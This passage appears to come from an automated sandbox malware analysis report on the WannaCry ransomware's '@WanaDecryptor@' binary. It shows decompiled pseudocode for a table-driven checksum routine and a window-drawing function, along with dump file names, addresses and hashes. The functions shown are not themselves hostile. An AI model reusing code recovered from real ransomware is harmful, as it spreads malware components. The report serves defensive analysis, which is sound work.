0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008 ^  *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4);
							_t76 = _t76 + 8;
							_t115 = _t115 - 1;
						} while (_t115 != 0);
					}
					if(_t118 != 0) {
						do {
							_t29 = _t29 >> 0x00000008 ^  *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4);
							_t76 = _t76 + 1;
							_t118 = _t118 - 1;
						} while (_t118 != 0);
					}
					return  !_t29;
				} else {
					return 0;
				}
			}

0x0040ff90
0x0040ff96
0x0040ffa1
0x0040ffa8
0x0040ffaa
0x0040ffb3
0x0040ffb6
0x0040ffd0
0x00410093
0x00410095
0x00410096
0x00410096
0x0041009d
0x004100a0
0x004100a2
0x004100ba
0x004100bc
0x004100bd
0x004100bd
0x004100a2
0x004100c4
0x0040ff98
0x0040ff9a
0x0040ff9a

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d39ba973bdaee26a7e96979db138631e8a564ea24786ef9523c099e99afe77a
Instruction ID: cecdefe8fda50f928b4117980ad8d25e533be349777a256c316ace181cfd3b57
Opcode Fuzzy Hash: 5d39ba973bdaee26a7e96979db138631e8a564ea24786ef9523c099e99afe77a
Instruction Fuzzy Hash: 1E31A6627A959207D350CEBEAC90277BB93D7DB306B6CC678D584C7A0EC579D8078244

Uniqueness

Uniqueness Score: -1.00%

Function 004090F0 Relevance: 56.5, APIs: 21, Strings: 11, Instructions: 454
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004090F0(intOrPtr* __ecx, void* __fp0) {
				signed int _t226;
				signed int _t230;
				struct tagPOINT _t232;
				long _t233;
				signed int _t237;
				signed int _t242;
				intOrPtr _t246;
				intOrPtr* _t264;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t276;
				intOrPtr _t279;
				signed int _t282;
				intOrPtr* _t283;
				struct tagPOINT _t295;
				signed int _t311;
				signed int _t314;
				signed int** _t321;
				intOrPtr _t361;
				intOrPtr _t418;
				intOrPtr* _t429;
				signed int* _t433;
				long _t437;
				signed int _t438;
				intOrPtr* _t440;
				signed int _t441;
				intOrPtr _t442;
				void* _t443;

				_push(0xffffffff);
				_push(E0041414D);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t442;
				_t443 = _t442 - 0xc4;
				_t321 =  *(_t443 + 0xd8);
				_t226 = _t321[1];
				_t429 = __ecx;
				if((_t226 & 0x00000003) == 0) {
					L49:
					 *[fs:0x0] =  *((intOrPtr*)(_t443 + 0xd4));
					return _t226;
				}
				_t433 =  *_t321;
				 *(_t443 + 0x40) = _t226 & 0x00000004;
				 *(_t443 + 0x10) = 0;
				L00412DA6();
				_push(_t443 + 0x14);
				 *((intOrPtr*)(_t443 + 0xe0)) = 0;
				L00412DD6();
				_t230 = _t321[1] & 0x00000300;
				if(_t230 == 0x100) {
					if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
						_push("%d%%");
						L00412DA0();
					}
					_t232 = _t321[7];
					 *((intOrPtr*)(_t443 + 0x28)) = _t321[6].x - _t232;
					asm("fild dword [esp+0x28]");
					 *((intOrPtr*)(_t443 + 0x28)) = _t321[8] - _t232;
					asm("fidiv dword [esp+0x28]");
					L0041304A();
					 *(_t443 + 0x10) = _t232;
				} else {
					if(_t230 == 0x200) {
						if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
							_push("%d");
							L00412DA0();
						}
						 *(_t443 + 0x10) = _t321[6];
					}
				}
				_t226 =  *(_t443 + 0x14);
				if( *((intOrPtr*)(_t226 - 8)) == 0) {
					L48:
					 *(_t443 + 0xdc) = 0xffffffff;
					L00412CC2();
					goto L49;
				} else {
					_t233 = SendMessageA( *(_t429 + 0x20), 0x31, 0, 0);
					L00412DE2();
					_t437 = _t233;
					 *(_t443 + 0x54) = _t433;
					 *(_t443 + 0x50) = 0x416794;
					 *(_t443 + 0xdc) = 1;
					E00409DF0(_t443 + 0x58);
					 *(_t443 + 0x58) = 0x416780;
					 *((char*)(_t443 + 0xe0)) = 2;
					 *(_t443 + 0x64) = 0;
					 *(_t443 + 0x54) = 0x41677c;
					E00409870(_t443 + 0x54, _t437);
					 *(_t443 + 0x68) = _t433;
					 *((char*)(_t443 + 0xe0)) = 4;
					 *(_t443 + 0x70) = 0xffffffff;
					 *(_t443 + 0x68) = 0x416778;
					_t237 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x60)), _t233);
					 *(_t443 + 0x90) = _t237;
					 *(_t443 + 0x6c) = _t237;
					 *(_t443 + 0x88) = _t433;
					_push(1);
					 *((char*)(_t443 + 0xe0)) = 6;
					 *(_t443 + 0x90) = 0;
					 *(_t443 + 0x88) = 0x416774;
					L00412DC4();
					 *(_t443 + 0x70) = _t237;
					 *(_t443 + 0x8c) = _t237;
					 *(_t443 + 0x7c) = _t433;
					_push(0xe);
					 *((char*)(_t443 + 0xe0)) = 8;
					 *(_t443 + 0x84) = 0xffffffff;
					 *(_t443 + 0x7c) = 0x416770;
					L00413004();
					 *(_t443 + 0x74) = _t237;
					 *(_t443 + 0x80) = _t237;
					 *((char*)(_t443 + 0xe4)) = 9;
					GetWindowOrgEx(_t433[2], _t443 + 0x1c);
					 *(_t443 + 0x48) =  *(_t443 + 0x1c);
					 *(_t443 + 0x4c) =  *(_t443 + 0x20);
					L00412DA6();
					_push( *(_t443 + 0x10));
					_push( *(_t443 + 0x14));
					_push(_t443 + 0x1c);
					 *((char*)(_t443 + 0xe8)) = 0xa;
					L00412E00();
					_t443 = _t443 + 0xc;
					_t242 = 0;
					 *((intOrPtr*)(_t443 + 0x28)) = 0;
					if(_t437 != 0) {
						GetObjectA( *(_t437 + 4), 0x3c, _t443 + 0x98);
						_t242 = 0;
						 *((intOrPtr*)(_t443 + 0x28)) = (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2) + (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2 >> 0x1f);
					}
					 *(_t443 + 0x10) = _t242;
					 *(_t443 + 0x2c) = _t242;
					 *(_t443 + 0x24) = _t242;
					_t438 = 0;
					GetTextExtentPoint32A(_t433[2],  *(_t443 + 0x18),  *( *(_t443 + 0x18) - 8), _t443 + 0x1c);
					_t246 =  *((intOrPtr*)(_t443 + 0x28));
					if(_t246 != 0) {
						if(_t246 != 0x5a) {
							if(_t246 != 0xb4) {
								if(_t246 != 0x10e) {
									goto L21;
								}
								_t441 =  *(_t443 + 0x20);
								 *(_t443 + 0x10) = _t441;
								 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
								_t438 =  ~_t441;
								L20:
								 *(_t443 + 0x24) = 0;
								goto L21;
							}
							_t311 =  *(_t443 + 0x20);
							 *(_t443 + 0x2c) = _t311;
							_t438 = 0;
							 *(_t443 + 0x10) =  *(_t443 + 0x1c);
							 *(_t443 + 0x24) =  ~_t311;
							goto L21;
						}
						_t438 =  *(_t443 + 0x20);
						 *(_t443 + 0x10) = _t438;
						 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
						goto L20;
					} else {
						_t314 =  *(_t443 + 0x20);
						 *(_t443 + 0x10) =  *(_t443 + 0x1c);
						 *(_t443 + 0x2c) = _t314;
						 *(_t443 + 0x24) = _t314;
						L21:
						GetViewportOrgEx(_t433[2], _t443 + 0x1c);
						if((_t321[1] & 0x00000010) == 0) {
							asm("cdq");
							 *(_t443 + 0x44) =  *_t433;
							asm("cdq");
							 *((intOrPtr*)( *(_t443 + 0x48) + 0x40))(_t443 + 0x44, _t321[2] + (_t321[4] - _t321[2] + _t438 - _t321[2] >> 1), _t321[3] + (_t321[5] - _t321[3] +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1));
							if( *((intOrPtr*)(_t429 + 0x60)) !=  *((intOrPtr*)(_t429 + 0x64))) {
								_t264 =  *((intOrPtr*)(_t443 + 0xec));
								if( *_t264 !=  *((intOrPtr*)(_t264 + 8))) {
									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t264, _t443 + 0x1c, _t443 + 0x48);
								}
								_t440 =  *((intOrPtr*)(_t443 + 0xe8));
								if( *((intOrPtr*)(_t440 + 8)) >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8))) {
									_t282 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
									if( *(_t443 + 0x90) == 0xffffffff) {
										 *(_t443 + 0x6c) = _t282;
									}
									_t283 = _t440;
									 *((intOrPtr*)(_t443 + 0x30)) =  *_t283;
									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t283 + 4));
									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t283 + 8));
									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t283 + 0xc));
									 *((intOrPtr*)(_t443 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8));
									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t443 + 0x34, _t443 + 0x1c, _t443 + 0x48);
								}
								if( *_t440 >=  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
									L39:
									 *((intOrPtr*)( *_t433 + 0x40))(_t443 + 0x20,  *(_t443 + 0x1c),  *(_t443 + 0x20));
									 *(_t443 + 0xdc) = 9;
									L00412CC2();
									 *(_t443 + 0x78) = 0x416770;
									_t269 =  *(_t443 + 0x74);
									 *(_t443 + 0xdc) = 0xb;
									if(_t269 != 0xffffffff) {
										_push(_t269);
										L00413004();
									}
									 *(_t443 + 0x84) = 0x416774;
									_t270 =  *(_t443 + 0x70);
									 *(_t443 + 0xdc) = 0xc;
									if(_t270 != 0) {
										_push(_t270);
										L00412DC4();
									}
									 *(_t443 + 0x64) = 0x416778;
									_t271 =  *(_t443 + 0x6c);
									 *(_t443 + 0xdc) = 0xd;
									if(_t271 != 0xffffffff) {
										 *((intOrPtr*)( *_t433 + 0x38))(_t271);
									}
									 *(_t443 + 0x50) = 0x41677c;
									_t272 =  *(_t443 + 0x60);
									 *(_t443 + 0xdc) = 0xf;
									if(_t272 != 0) {
										 *((intOrPtr*)( *( *(_t443 + 0x54)) + 0x30))(_t272);
									}
									 *(_t443 + 0x60) = 0;
									L00412D52();
									_t226 = _t443 + 0x58;
									 *(_t443 + 0x58) = 0x415c00;
									 *(_t443 + 0x70) = _t226;
									 *(_t443 + 0xdc) = 0x10;
									L00412D52();
									 *(_t443 + 0x58) = 0x415bec;
									 *(_t443 + 0x50) = 0x416794;
									goto L48;
								} else {
									_t276 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
									if( *(_t443 + 0x6c) == 0xffffffff) {
										 *(_t443 + 0x6c) = _t276;
									}
									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t440 + 4));
									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t440 + 8));
									 *((intOrPtr*)(_t443 + 0x30)) =  *_t440;
									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))));
									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t440 + 0xc));
									_t279 =  *_t429;
									_push(_t443 + 0x48);
									_push(_t443 + 0x18);
									_t361 = _t443 + 0x38;
									L38:
									 *((intOrPtr*)(_t279 + 0xcc))(_t321, _t361);
									goto L39;
								}
							}
							 *((intOrPtr*)( *_t429 + 0xcc))(_t321,  *((intOrPtr*)(_t443 + 0xec)), _t443 + 0x1c, _t443 + 0x48);
							goto L39;
						}
						E00409D40(_t443 + 0x30, _t321,  *((intOrPtr*)(_t443 + 0xec)));
						_t295 =  *(_t443 + 0x2c);
						if( *(_t443 + 0x40) == 0) {
							_t295 =  *(_t443 + 0x10);
						}
						if(_t295 >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8)) -  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
							goto L39;
						} else {
							asm("cdq");
							_t418 =  *((intOrPtr*)(_t443 + 0x34));
							 *(_t443 + 0x40) =  *_t433;
							asm("cdq");
							 *((intOrPtr*)( *(_t443 + 0x44) + 0x40))(_t443 + 0x98, ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x30)) + _t438 - _t418 >> 1) +  *((intOrPtr*)(_t443 + 0x30)), ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x34)) +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1) + _t418);
							_t279 =  *_t429;
							_push(_t443 + 0x48);
							_t361 =  *((intOrPtr*)(_t443 + 0xf0));
							_push(_t443 + 0x18);
							goto L38;
						}
					}
				}
			}

0x004090f6
0x004090f8
0x004090fd
0x004090fe
0x00409105
0x0040910c
0x00409115
0x0040911c
0x0040911e
0x0040971e
0x00409729
0x00409736
0x00409736
0x00409124
0x0040912f
0x00409133
0x00409137
0x00409142
0x00409143
0x0040914a
0x00409152
0x0040915c
0x0040918c
0x0040918e
0x00409197
0x00409197
0x0040919c
0x004091a7
0x004091ad
0x004091b1
0x004091bb
0x004091bf
0x004091c4
0x0040915e
0x00409163
0x0040916c
